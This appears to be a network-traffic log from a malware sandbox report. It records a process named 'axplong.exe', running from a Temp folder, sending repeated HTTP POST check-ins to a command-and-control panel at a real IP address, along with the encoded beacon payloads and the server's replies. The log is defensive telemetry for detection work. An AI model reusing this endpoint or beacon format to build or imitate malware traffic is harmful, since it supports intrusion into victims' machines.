Jul 2, 2024 00:27:03.513945103 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:04.203516006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	49860	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:04.328504086 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:05.041497946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	49861	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:05.051107883 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:05.762242079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	49862	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:05.874900103 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:06.573016882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	49863	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:06.582987070 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:07.275258064 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	49864	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:07.391180992 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	49865	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:07.407612085 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:08.113143921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	49866	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:08.242755890 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:08.958517075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	49867	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:08.969862938 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:09.681708097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	49868	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:09.798860073 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:10.517594099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	49869	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:10.534929037 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:11.252722025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	49870	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:11.376405954 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:12.096815109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	49871	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:12.117258072 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:12.815177917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	49872	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:12.937061071 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:13.632560968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	49873	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:13.650718927 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:14.352919102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	49874	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:14.470936060 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:15.186064005 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	49875	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:15.491894007 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:16.137949944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	49876	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:16.317440987 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:17.015717030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	49877	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:17.027944088 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:17.760529041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	49878	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:17.876060009 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:18.591965914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	49879	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:18.615530014 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:19.344676018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	49880	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:19.783449888 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:27:20.489322901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49881	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:20.498621941 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:27:21.208684921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:27:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	49882	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:27:21.329201937 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

